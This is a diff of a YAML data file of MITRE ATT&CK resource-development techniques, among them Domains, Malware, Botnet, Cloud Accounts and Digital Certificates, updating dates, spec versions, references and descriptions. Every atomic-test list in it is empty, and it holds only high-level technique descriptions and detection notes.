+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -52233,17 +52915,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -52296,11 +52977,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -52336,7 +53016,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -52385,43 +53065,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -52434,18 +53083,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -52467,7 +53147,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -52483,8 +53163,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -52506,7 +53184,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52526,8 +53204,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -52566,7 +53242,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52587,8 +53263,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -52618,7 +53292,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -52655,8 +53329,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -52678,7 +53350,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52700,8 +53372,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -52738,7 +53408,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -52760,8 +53430,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -52823,7 +53491,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -52845,7 +53512,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52863,8 +53530,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -52899,7 +53564,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52918,33 +53583,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -52954,10 +53617,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -52965,9 +53637,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -53018,11 +53689,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -53035,7 +53705,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -53070,22 +53740,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -53106,7 +53779,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -53145,6 +53818,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -53200,7 +53877,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -53258,7 +53934,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -53338,7 +54013,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -53398,7 +54072,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -53420,7 +54093,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -53439,42 +54112,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
